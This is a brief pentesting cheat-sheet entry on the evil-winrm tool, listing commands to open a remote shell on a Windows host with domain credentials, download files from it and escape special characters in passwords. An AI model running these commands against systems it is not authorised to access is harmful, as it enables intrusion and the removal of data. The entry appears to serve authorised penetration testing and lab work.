evil-winrm

Getting a shell with valid domain user credentials. Also requires that the user is in the "BUILTIN\Remote Management Users" group.

evil-winrm -i 10.129.145.206 -u domain\\user -p password

Download a file over the remote managment session.

download ./file_on_windows_host.txt file_name_on_linux_host.txt

Escaping special characters on connection establishment.

evil-winrm -i 192.168.50.220 -u user1 -p "qwertqwertqwert123\!\!"

Last updated

Was this helpful?